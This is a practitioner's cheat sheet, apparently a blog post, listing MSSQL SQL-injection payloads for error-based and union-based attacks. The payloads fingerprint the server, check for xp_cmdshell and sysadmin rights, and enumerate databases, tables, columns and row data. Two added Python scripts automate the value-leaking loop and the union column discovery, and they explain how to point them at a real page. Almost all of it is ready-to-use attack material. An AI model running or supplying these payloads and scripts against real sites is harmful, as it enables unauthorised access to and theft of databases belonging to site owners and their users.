I have been doing a lot of manual injection recently, so I will list the MSSQL statements I have used lately for future convenience!
MSSQL comment markers:
--      (line comment; the usual terminator of an injected payload)
/* */   (block comment)
// Note: # is not a comment marker in T-SQL (that is MySQL); a trailing # in an MSSQL payload just causes a syntax error.
Error-based mode (the page displays the database error message):
Determine whether stacked queries (several statements in one request) are accepted
URL?id=13;declare @x int--
// No error means the ';' separator got through, so further statements can be appended.
View the database version
URL?id=13 and @@version>0--
// Comparing a string with an int forces a conversion error that echoes the string back in the error text.
View the currently connected database user
URL?id=13 and user>0--
View the current database name
URL?id=13 and db_name()>0--
Enumerate database names
URL?id=13 and 1=convert(int,(select name from master.dbo.sysdatabases where dbid=7))--
// dbid 1 to 4 are master, tempdb, model and msdb (older installs also ship pubs and Northwind as 5 and 6), which is why user databases usually start at dbid 7. Increase dbid to walk the rest; no error means that dbid does not exist.
Enumerate the table names of the current database
URL?id=13 and 1=convert(int,(select top 1 name from sysobjects where xtype='U'))--
URL?id=13 and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('table1','table2')))--
// Add each name that leaks to the not in list to get the next one; no error means the list is complete.
Table names of another database
URL?id=13 and 1=convert(int,(select top 1 name from [dbname]..sysobjects where xtype='U'))--
URL?id=13 and 1=convert(int,(select top 1 name from [dbname]..sysobjects where xtype='U' and name not in ('table1','table2')))--
Column names (of the table behind the current query)
URL?id=13 having 1=1--
// The error names the first column as table.column, because it appears in the select list without a GROUP BY.
URL?id=13 group by table.column1,column2 having 1=1--
// Add each leaked column to the group by list to get the next one; no error means every column is known.
Column names of another table (needs stacked queries)
URL?id=13;select * from tablename having 1=1--
URL?id=13;select * from tablename group by tablename.column1,column2 having 1=1--
Dump data
URL?id=13 and 1=convert(int,(select top 1 column from tablename))--
URL?id=13 and 1=convert(int,(select top 1 column from tablename where column not in ('data1','data2')))--
URL?id=13 and 1=convert(int,(select top 1 column from tablename where column!='data1' and column!='data2'))--
// Any where clause works for walking the rows, as long as the subquery returns exactly one value for convert() to choke on.
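The error-based walk above (one request per value, adding each leaked value to the not in list) is easy to automate. The following is an added example, not code from the original notes: it builds the convert(int,(select top 1 ...)) payloads, parses the value SQL Server echoes in its conversion error, and loops until the error stops. The target is a constructed stand-in function that mimics an error-displaying page; the injected parameter is assumed to be id=13 as in the notes.

```python
import re
from typing import Callable, List, Optional

# Added example (not part of the original notes): automates the error-based
# "1=convert(int,(select top 1 ... not in (...)))" walk. The target below is a
# constructed stand-in function, not a real server.

# Matches both the SQL Server 2005+ wording ("Conversion failed when converting
# the nvarchar value 'x' to data type int.") and the SQL Server 2000 wording
# ("Syntax error converting the nvarchar value 'x' to a column of data type int.").
# The greedy (.*) keeps a value that itself contains a single quote intact.
CONVERT_ERROR = re.compile(
    r"converting the (?:n?varchar|n?char) value '(.*)' to (?:a column of )?data type int",
    re.IGNORECASE,
)


def sql_str(value: str) -> str:
    """Quote a T-SQL string literal, doubling any embedded single quote."""
    return "'" + value.replace("'", "''") + "'"


def next_value_payload(column: str, table: str, seen: List[str],
                       condition: Optional[str] = None) -> str:
    """Value for the id parameter that leaks the first row of `column` not yet in `seen`."""
    clauses = []
    if condition:
        clauses.append(condition)
    if seen:
        clauses.append(f"{column} not in ({','.join(sql_str(s) for s in seen)})")
    where = f" where {' and '.join(clauses)}" if clauses else ""
    return f"13 and 1=convert(int,(select top 1 {column} from {table}{where}))--"


def leaked_value(response: str) -> Optional[str]:
    """The string SQL Server echoed in its conversion error, or None if no error was shown."""
    m = CONVERT_ERROR.search(response)
    return None if m is None else m.group(1)


def enumerate_values(fetch: Callable[[str], str], column: str, table: str,
                     condition: Optional[str] = None, limit: int = 200) -> List[str]:
    """Walk every distinct value of `column`, one request per value, until no error is raised."""
    seen: List[str] = []
    while len(seen) < limit:
        value = leaked_value(fetch(next_value_payload(column, table, seen, condition)))
        if value is None:          # no conversion error: the not-in list already covers every row
            break
        seen.append(value)
    return seen


# ---- constructed stand-in for the injectable page (assumption: id=13 is the injected parameter) ----
FAKE_TABLES = ["users", "orders", "o'reilly_log"]   # constructed sample table names


def fake_target(payload: str) -> str:
    """Mimics an error-displaying ASP page in front of SQL Server for the payloads built above."""
    excluded: List[str] = []
    m = re.search(r"not in \((.*?)\)\)\)--$", payload)
    if m:
        excluded = [s.replace("''", "'") for s in re.findall(r"'((?:[^']|'')*)'", m.group(1))]
    remaining = [t for t in FAKE_TABLES if t not in excluded]
    if remaining:
        return ("Microsoft OLE DB Provider for SQL Server error '80040e07' "
                f"Conversion failed when converting the nvarchar value '{remaining[0]}' "
                "to data type int.")
    return "<html>normal page</html>"


if __name__ == "__main__":
    print(enumerate_values(fake_target, "name", "sysobjects", condition="xtype='U'"))
```

Against a real page, replace fake_target with a function that sends the payload as the id parameter and returns the response body. The `limit` guard matters because a target that keeps returning the same value (for example a column with NULLs, which convert() never chokes on, or a page that caches responses) would otherwise loop forever.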
Union-based mode (no error message is displayed)
URL?id=13 order by N--
// Raise N until the page breaks; the largest N that still renders is the number of columns in the original query.
URL?id=13 and 1=2 union select ?,?,?,?,?--
// Use exactly as many ? as order by found. Each ? is a placeholder of a compatible type; null is accepted by every column type. The 1=2 empties the original result so only the injected row is shown.
Query the database version and OS version (@@version reports both)
URL?id=13 and 1=2 union select ?,?,?,@@version--
Query the database user
URL?id=13 and 1=2 union select ?,?,?,(select user)--
URL?id=13 and 1=2 union select ?,?,?,(select system_user)--
// user is the database user of the current connection; system_user is the login name.
Query the host name
URL?id=13 and 1=2 union select ?,?,?,(select host_name())--
// host_name() is the name of the client connecting to SQL Server, i.e. usually the web server, not the database server.
Query the database name
URL?id=13 and 1=2 union select ?,?,?,(select db_name())--
Check whether the extended stored procedure xp_cmdshell exists
URL?id=13 and 1=2 union select ?,?,?,(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')--
// 1 means it exists, 0 means it does not.
Check the privileges of the current database user
URL?id=13 and 1=2 union select ?,?,?,(select is_srvrolemember('sysadmin'))--
// 1 means the current login is a member of the sysadmin server role, 0 means it is not.
Query database names
URL?id=13 and 1=2 union select ?,?,?,(select name from master.dbo.sysdatabases where dbid=7)--
// dbid 1 to 4 are master, tempdb, model and msdb (older installs also ship pubs and Northwind as 5 and 6), so user databases usually start at dbid 7.
Query table names
URL?id=13 and 1=2 union select ?,?,?,(select top 1 name from sysobjects where xtype='U')--
URL?id=13 and 1=2 union select ?,?,?,(select top 1 name from sysobjects where xtype='U' and name not in ('table1','table2'))--
Query column names
URL?id=13 and 1=2 union select ?,?,?,(select top 1 name from dbname.dbo.syscolumns where id=object_id('tablename'))--
URL?id=13 and 1=2 union select ?,?,?,(select top 1 name from dbname.dbo.syscolumns where id=object_id('tablename') and name not in ('column1','column2'))--
Query data
URL?id=13 and 1=2 union select ?,?,?,(select top 1 column from tablename)--
URL?id=13 and 1=2 union select ?,?,?,(select top 1 column from tablename where column not in ('data1','data2'))--
// The subquery must return a single value; put it in a ? position that the page actually prints.
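The union-based procedure above has three mechanical steps: find the column count with order by, find which ? positions the page prints, and place the subquery in one of them. The following is an added example, not code from the original notes, that carries the notes' procedure through in code; the marker probe for printed positions goes slightly beyond the notes, which only say to swap a subquery into one ?. The target is a constructed stand-in with four columns of which two are printed; the injected parameter is assumed to be id=13 as in the notes.

```python
import re
from typing import Callable, List

# Added example (not part of the original notes): finds the column count with
# "order by N", finds which ? positions the page actually prints, and builds the
# "and 1=2 union select ..." payload with a subquery in a printed position.
# The target is a constructed stand-in, not a real server; the injected
# parameter is assumed to be id=13 as in the notes above.


def looks_like_error(response: str) -> bool:
    """Crude breakage check; tune this to the real page (status code, length, a known error string)."""
    return "error" in response.lower()


def column_count(fetch: Callable[[str], str], probe_limit: int = 50) -> int:
    """Largest N for which 'order by N' still renders normally; 0 if even 'order by 1' breaks."""
    count = 0
    for n in range(1, probe_limit + 1):
        if looks_like_error(fetch(f"13 order by {n}--")):
            break
        count = n
    return count


def union_payload(ncols: int, position: int, expression: str) -> str:
    """'and 1=2 union select ...' with `expression` in `position` and null elsewhere.

    null is accepted by every column type, so it is the safe filler for the ? placeholders.
    """
    if not 1 <= position <= ncols:
        raise ValueError("position must be between 1 and ncols")
    cols = ["null"] * ncols
    cols[position - 1] = expression
    return "13 and 1=2 union select " + ",".join(cols) + "--"


def visible_positions(fetch: Callable[[str], str], ncols: int) -> List[int]:
    """Positions whose value the page prints, found by injecting one string marker at a time.

    One marker per request (nulls elsewhere) so that a numeric column rejecting the
    string marker only spoils that one probe rather than all of them.
    """
    shown = []
    for pos in range(1, ncols + 1):
        response = fetch(union_payload(ncols, pos, f"'MARK{pos}'"))
        if f"MARK{pos}" in response:
            shown.append(pos)
    return shown


# ---- constructed stand-in for the injectable page ----
FAKE_NCOLS = 4            # constructed: the original query selects 4 columns
FAKE_SHOWN = (2, 4)       # constructed: the page prints columns 2 and 4


def fake_target(payload: str) -> str:
    """Mimics the page's reaction to the order by and union payloads built above."""
    m = re.fullmatch(r"13 order by (\d+)--", payload)
    if m:
        if int(m.group(1)) <= FAKE_NCOLS:
            return "<html>normal page</html>"
        return ("Error: The ORDER BY position number %s is out of range of the number "
                "of items in the select list." % m.group(1))
    m = re.fullmatch(r"13 and 1=2 union select (.*)--", payload)
    if m:
        cols = m.group(1).split(",")
        if len(cols) != FAKE_NCOLS:
            return ("Error: All queries combined using a UNION, INTERSECT or EXCEPT operator "
                    "must have an equal number of expressions in their target lists.")
        return "<html>" + " ".join(cols[i - 1].strip("'") for i in FAKE_SHOWN) + "</html>"
    return "<html>normal page</html>"


if __name__ == "__main__":
    n = column_count(fake_target)
    print(n, visible_positions(fake_target, n), union_payload(n, 4, "@@version"))
```

Once the printed positions are known, any of the subqueries in the notes above can be passed as `expression`, e.g. `union_payload(n, 4, "(select top 1 name from sysobjects where xtype='U')")`. On a real target, looks_like_error should be replaced by whatever distinguishes a broken page there; a generic "error" substring check is only a starting point.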
Other statements
Enumerate table names (walking with top N instead of a not in list)
URL?id=13 and 1=2 union select ?,?,?,(select top 1 name from sysobjects where xtype='U' and name not in (select top 0 name from sysobjects where xtype='U'))--
// Increase the inner top N from 0 upwards to walk the table names of the current database one by one.
Table names of another database
URL?id=13 and 1=2 union select ?,?,?,(select top 1 name from [dbname]..sysobjects where xtype='U' and name not in (select top 0 name from [dbname]..sysobjects where xtype='U'))--
Enumerate column names
URL?id=13 and 1=2 union select ?,?,?,(select top 1 name from syscolumns where id in (select id from sysobjects where name='tablename') and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name='tablename')))--
// Increase the inner top N from 0 upwards to walk the column names of the table (the original note used the admin table).
Query data
URL?id=13 and 1=2 union select top 1 ?,?,column from tablename where column not in (select top 0 column from tablename)--
// Increase the inner top N from 0 upwards to walk the rows.
// Caveat: the top N / not in (top N) trick assumes both selects return rows in the same order; without an order by that is usual but not guaranteed, so if a value repeats or is skipped, fall back to the explicit not in ('data1','data2') list.